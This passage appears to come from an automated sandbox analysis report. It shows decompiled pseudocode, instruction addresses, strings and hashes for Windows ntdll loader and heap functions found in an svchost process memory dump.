                                          0x03a4a28d
                                          0x03a4a294
                                          0x03a91cc1
                                          0x03a4a29a
                                          0x03a4a29a
                                          0x03a4a29a
                                          0x03a4a29f
                                          0x03a91ccb
                                          0x03a91cd1
                                          0x03a91cd8
                                          0x03a91cea
                                          0x03a91cea
                                          0x03a91cd8
                                          0x03a4a2a9
                                          0x03a4a2af
                                          0x03a4a2bc
                                          0x03a91cfd
                                          0x03a4a2c2
                                          0x03a4a2c2
                                          0x03a4a2c2
                                          0x03a4a2c7
                                          0x03a91d07
                                          0x03a91d0d
                                          0x03a91d14
                                          0x03a91d1f
                                          0x03a91d21
                                          0x03a91d2c
                                          0x03a91d2c
                                          0x03a91d2c
                                          0x03a91d47
                                          0x03a91d47
                                          0x03a91d14
                                          0x03a4a2cd
                                          0x03a4a2d2
                                          0x03a4a2d9
                                          0x03a91d5a
                                          0x03a4a2df
                                          0x03a4a2df
                                          0x03a4a2df
                                          0x03a4a2e4
                                          0x03a91d69
                                          0x03a91d6b
                                          0x03a91d76
                                          0x03a91d76
                                          0x03a91d76
                                          0x03a91d91
                                          0x03a91d91
                                          0x03a4a2ea
                                          0x03a4a2f0
                                          0x03a4a2f5
                                          0x03a91da8
                                          0x03a91dad
                                          0x03a91dad
                                          0x03a4a2fd
                                          0x03a4a300
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                          • API String ID: 2994545307-2586055223
                                          • Opcode ID: 0f5025818a278936721b73c749a597321d4c1b9428f9b0f782ddbdad84869fd6
                                          • Instruction ID: ddd12eea5f94531252ecb9bee90c5264acd15a9c2230c1cab6b76e8653fab7d8
                                          • Opcode Fuzzy Hash: 0f5025818a278936721b73c749a597321d4c1b9428f9b0f782ddbdad84869fd6
                                          • Instruction Fuzzy Hash: 4851F2312457819FE722DB68C949F27B7E8FB84B50F08096BF4659B3A1D735D800CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A58E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 44%
                                          			E03A58E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x3b1d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x3b18464; // 0x74cc0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x3b15780 & 0x00000003) != 0) {
							E03AA5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x3b15780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E03A6B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x3b17984; // 0x34036d0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x3b18464; // 0x74cc0110
					 *0x3b1b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E03A59B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x3b15780 & 0x00000005) != 0) {
						_push(_t49);
						E03AA5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                          0x03a58e0f
                                          0x03a58e16
                                          0x03a58e19
                                          0x03a58e1b
                                          0x03a58e21
                                          0x03a58e7f
                                          0x03a58e85
                                          0x03a99354
                                          0x03a9936c
                                          0x03a99371
                                          0x03a9937b
                                          0x03a99381
                                          0x03a99381
                                          0x03a9937b
                                          0x03a58e9d
                                          0x03a58e9d
                                          0x03a58e29
                                          0x03a58e2c
                                          0x03a58e38
                                          0x03a58e3e
                                          0x03a58e43
                                          0x03a58eb5
                                          0x03a58eb9
                                          0x03a992aa
                                          0x03a992af
                                          0x03a992e8
                                          0x03a992e8
                                          0x03a992af
                                          0x03a58eb9
                                          0x03a58e45
                                          0x03a58e53
                                          0x03a58e5b
                                          0x03a58e5f
                                          0x03a58e78
                                          0x03a58e78
                                          0x03a58e7d
                                          0x03a58ec3
                                          0x03a58ecd
                                          0x03a58ed2
                                          0x03a58ed2
                                          0x03a58ec5
                                          0x03a58ec5
                                          0x00000000
                                          0x03a58e7d
                                          0x03a58e67
                                          0x03a58ea4
                                          0x03a9931a
                                          0x00000000
                                          0x00000000
                                          0x03a99320
                                          0x03a58ea4
                                          0x03a58e70
                                          0x03a99325
                                          0x03a99340
                                          0x03a99345
                                          0x03a99345
                                          0x03a58e76
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Strings
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 03A9933B, 03A99367
                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 03A99357
                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 03A9932A
                                          • LdrpFindDllActivationContext, xrefs: 03A99331, 03A9935D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 0-3779518884
                                          • Opcode ID: 76f5fee04317cb21b29b23d449b53767235ed64944fe0355b97b9dc1d275fc1a
                                          • Instruction ID: 86b2153670bb75ea852709ee2bbaa488665bacb7b4ca2a302935c37d4e496a7c
                                          • Opcode Fuzzy Hash: 76f5fee04317cb21b29b23d449b53767235ed64944fe0355b97b9dc1d275fc1a
                                          • Instruction Fuzzy Hash: 4E412D32B80311AEDF35EB089849A76B3BCB705604F0D456FFC145B591D778EC808283
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AE49A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                          • API String ID: 2994545307-336120773
                                          • Opcode ID: d14300a021cf5cb247c08e5c717338fe286874b429fa2b11e78cc5381da64da3
                                          • Instruction ID: 8d1275ec903253e20fd991ba00c1b04f78364adcae7d4c0d530668d43bcef5af
                                          • Opcode Fuzzy Hash: d14300a021cf5cb247c08e5c717338fe286874b429fa2b11e78cc5381da64da3
                                          • Instruction Fuzzy Hash: DD31E539200214EFD711DB9AC98AF6BB7ACFF08734F18415BF4159B291D670E880C769
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A38794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E03A38794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E03A3934A() != 0) {
								_t159 = E03AAA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x3b15780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E03AA5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x3b15780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E03A3849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E03A38999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E03A38999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x3b15c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x3b15c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E03A42280(_t92, 0x3b186cc);
															_t94 = E03AF9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E03A561A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x3b15c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E03A38A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x3b15c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x3b15c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E03A6F380(_t136, 0x3a01184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E03A42280(_t108, 0x3b186cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E03A561A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E03AF9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E03A3FFB0(_t118, _t156, 0x3b186cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E03A69A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                          0x03a38799
                                          0x03a3879d
                                          0x03a387a1
                                          0x03a387a3
                                          0x03a387a8
                                          0x03a387c3
                                          0x03a387c3
                                          0x03a387c8
                                          0x03a387d1
                                          0x03a387d4
                                          0x03a387d8
                                          0x03a387e5
                                          0x03a387ec
                                          0x03a89bfe
                                          0x03a89c00
                                          0x03a89c02
                                          0x03a89c08
                                          0x03a89c0d
                                          0x03a89c0f
                                          0x03a89c14
                                          0x03a89c2d
                                          0x03a89c32
                                          0x03a89c37
                                          0x03a89c3a
                                          0x03a89c3c
                                          0x03a89c42
                                          0x03a89c42
                                          0x03a89c3c
                                          0x03a89c02
                                          0x03a387da
                                          0x03a387df
                                          0x03a387e3
                                          0x00000000
                                          0x00000000
                                          0x03a387e3
                                          0x03a387f2
                                          0x00000000
                                          0x03a387fb
                                          0x03a387fd
                                          0x03a387fe
                                          0x03a3880e
                                          0x03a3880f
                                          0x03a38810
                                          0x03a38814
                                          0x03a3881a
                                          0x03a3881c
                                          0x03a3881f
                                          0x03a38821
                                          0x03a38822
                                          0x03a38824
                                          0x03a38826
                                          0x03a3882c
                                          0x03a3882e
                                          0x03a89c48
                                          0x03a89c48
                                          0x03a38834
                                          0x03a38834
                                          0x03a38837
                                          0x00000000
                                          0x00000000
                                          0x03a38837
                                          0x03a3882e
                                          0x03a3883d
                                          0x03a38840
                                          0x03a38843
                                          0x03a38846
                                          0x03a38849
                                          0x03a3884c
                                          0x03a3884e
                                          0x03a38850
                                          0x03a38852
                                          0x03a38854
                                          0x03a38857
                                          0x03a388b4
                                          0x03a388b6
                                          0x03a388b6
                                          0x03a38859
                                          0x03a38859
                                          0x03a38859
                                          0x03a38861
                                          0x03a38866
                                          0x03a3886a
                                          0x03a3893d
                                          0x03a38941
                                          0x00000000
                                          0x03a38947
                                          0x03a38947
                                          0x03a3894a
                                          0x03a3894c
                                          0x00000000
                                          0x03a38952
                                          0x03a38955
                                          0x03a3895a
                                          0x03a3895d
                                          0x03a3895d
                                          0x03a3895f
                                          0x03a38961
                                          0x03a38961
                                          0x03a38968
                                          0x00000000
                                          0x00000000
                                          0x03a3896a
                                          0x03a3896b
                                          0x03a3896e
                                          0x00000000
                                          0x03a38970
                                          0x03a38970
                                          0x03a38970
                                          0x03a38970
                                          0x03a38972
                                          0x03a38972
                                          0x03a38974
                                          0x00000000
                                          0x03a3897a
                                          0x03a3897a
                                          0x03a3897d
                                          0x00000000
                                          0x03a38983
                                          0x03a89c65
                                          0x03a89c6d
                                          0x03a89c72
                                          0x03a89c75
                                          0x03a89c75
                                          0x03a89c82
                                          0x03a89c86
                                          0x03a89c87
                                          0x03a89c88
                                          0x03a89c89
                                          0x03a89c8c
                                          0x03a89c90
                                          0x03a89c95
                                          0x03a89c97
                                          0x03a89ca0
                                          0x03a89ca3
                                          0x03a89ca9
                                          0x03a89ca9
                                          0x00000000
                                          0x03a89ca9
                                          0x03a89ca3
                                          0x00000000
                                          0x03a89c97
                                          0x03a3897d
                                          0x00000000
                                          0x03a38974
                                          0x03a38988
                                          0x03a38992
                                          0x03a38996
                                          0x00000000
                                          0x03a38996
                                          0x03a3894c
                                          0x00000000
                                          0x03a38870
                                          0x03a3887b
                                          0x03a3887d
                                          0x03a3887f
                                          0x03a38881
                                          0x03a38884
                                          0x03a38884
                                          0x03a38886
                                          0x03a38889
                                          0x03a3888c
                                          0x03a3888e
                                          0x03a38891
                                          0x03a38891
                                          0x03a38898
                                          0x00000000
                                          0x00000000
                                          0x03a3889a
                                          0x03a3889b
                                          0x03a3889e
                                          0x00000000
                                          0x00000000
                                          0x03a388a0
                                          0x03a388a8
                                          0x03a388b0
                                          0x03a388b2
                                          0x03a388d3
                                          0x03a388d5
                                          0x00000000
                                          0x03a388d7
                                          0x03a388db
                                          0x03a388dc
                                          0x03a388e0
                                          0x03a388e8
                                          0x03a388ee
                                          0x03a388f0
                                          0x03a388f3
                                          0x03a388fc
                                          0x03a38901
                                          0x03a38906
                                          0x03a3890c
                                          0x03a3890c
                                          0x03a3890f
                                          0x03a38916
                                          0x03a38917
                                          0x03a38918
                                          0x03a38919
                                          0x03a3891a
                                          0x03a3891f
                                          0x03a38921
                                          0x03a89c52
                                          0x03a89c55
                                          0x03a89c5b
                                          0x03a89cac
                                          0x03a89cc0
                                          0x03a89cc0
                                          0x03a89c55
                                          0x03a38927
                                          0x03a38927
                                          0x03a3892f
                                          0x03a38933
                                          0x00000000
                                          0x03a388f5
                                          0x03a388f5
                                          0x00000000
                                          0x03a388f7
                                          0x03a388f7
                                          0x03a388fa
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a388fa
                                          0x03a388f5
                                          0x03a388f3
                                          0x00000000
                                          0x03a388d5
                                          0x00000000
                                          0x03a388b2
                                          0x03a388c9
                                          0x00000000
                                          0x03a388c9
                                          0x03a3887f
                                          0x03a3886a
                                          0x03a38857
                                          0x03a38852
                                          0x03a388bf
                                          0x03a388bf
                                          0x03a387aa
                                          0x03a387ad
                                          0x03a387ae
                                          0x03a387b4
                                          0x03a387b5
                                          0x03a387b6
                                          0x03a387b8
                                          0x03a387bd
                                          0x03a387c1
                                          0x03a387f4
                                          0x03a387fa
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a387c1
                                          0x00000000

                                          Strings
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 03A89C28
                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03A89C18
                                          • LdrpDoPostSnapWork, xrefs: 03A89C1E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 2994545307-1948996284
                                          • Opcode ID: fb64478355e070070e08c48cc60c1aa75e9ef1b3ff45e4931d593e42418689d1
                                          • Instruction ID: 81a3cde161773491751937d374366d47be299e8084cd2ef0a21492e2ee291a65
                                          • Opcode Fuzzy Hash: fb64478355e070070e08c48cc60c1aa75e9ef1b3ff45e4931d593e42418689d1
                                          • Instruction Fuzzy Hash: EC91F471A002199FDB18DF59C981ABAB3BDFF46354B5841AFF805AB250D734EA09CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A37E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E03A37E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E03A3CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E03A2C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x3b15780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E03AA5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x3b15780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E03A47D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03A47D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E03AA7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E03A47D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03A47D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E03AA7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E03A5A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E03A2B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                          0x03a37e4c
                                          0x03a37e50
                                          0x03a37e55
                                          0x03a37e58
                                          0x03a37e5d
                                          0x03a37e71
                                          0x03a37f33
                                          0x03a37e77
                                          0x03a37e77
                                          0x03a37e79
                                          0x03a37e79
                                          0x03a37e7e
                                          0x03a37f45
                                          0x03a89848
                                          0x00000000
                                          0x03a89848
                                          0x03a37f4e
                                          0x03a37f53
                                          0x03a37f5a
                                          0x00000000
                                          0x00000000
                                          0x03a8985a
                                          0x03a89862
                                          0x03a89866
                                          0x00000000
                                          0x03a8986c
                                          0x00000000
                                          0x03a8986c
                                          0x03a37e84
                                          0x03a37e84
                                          0x03a37e8d
                                          0x03a89871
                                          0x03a37eb8
                                          0x03a37ec0
                                          0x03a37ec0
                                          0x03a37e9a
                                          0x03a8987e
                                          0x00000000
                                          0x00000000
                                          0x03a89884
                                          0x03a8988b
                                          0x03a898a7
                                          0x03a898ac
                                          0x03a898b1
                                          0x03a898b6
                                          0x03a898b8
                                          0x03a898b8
                                          0x03a898b9
                                          0x00000000
                                          0x03a898b9
                                          0x03a37ea0
                                          0x03a37ea7
                                          0x00000000
                                          0x00000000
                                          0x03a37eac
                                          0x03a37eb1
                                          0x03a37ec6
                                          0x03a37ed0
                                          0x03a898cc
                                          0x03a37ed6
                                          0x03a37ed6
                                          0x03a37ed6
                                          0x03a37ede
                                          0x03a37ee3
                                          0x03a898e3
                                          0x03a898f0
                                          0x03a89902
                                          0x03a898f2
                                          0x03a898fb
                                          0x03a898fb
                                          0x03a89907
                                          0x03a8991d
                                          0x03a8991d
                                          0x03a89907
                                          0x03a898e3
                                          0x03a37ef0
                                          0x03a37f14
                                          0x03a37f14
                                          0x03a37f1e
                                          0x03a89946
                                          0x03a37f24
                                          0x03a37f24
                                          0x03a37f24
                                          0x03a37f2c
                                          0x03a8996a
                                          0x03a89975
                                          0x03a89975
                                          0x03a8997e
                                          0x03a89993
                                          0x03a89993
                                          0x03a8997e
                                          0x00000000
                                          0x03a37ef2
                                          0x03a37efc
                                          0x03a37f0a
                                          0x03a37f0e
                                          0x03a89933
                                          0x00000000
                                          0x03a89933
                                          0x00000000
                                          0x03a37f0e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a37eb1

                                          Strings
                                          • minkernel\ntdll\ldrmap.c, xrefs: 03A898A2
                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 03A89891
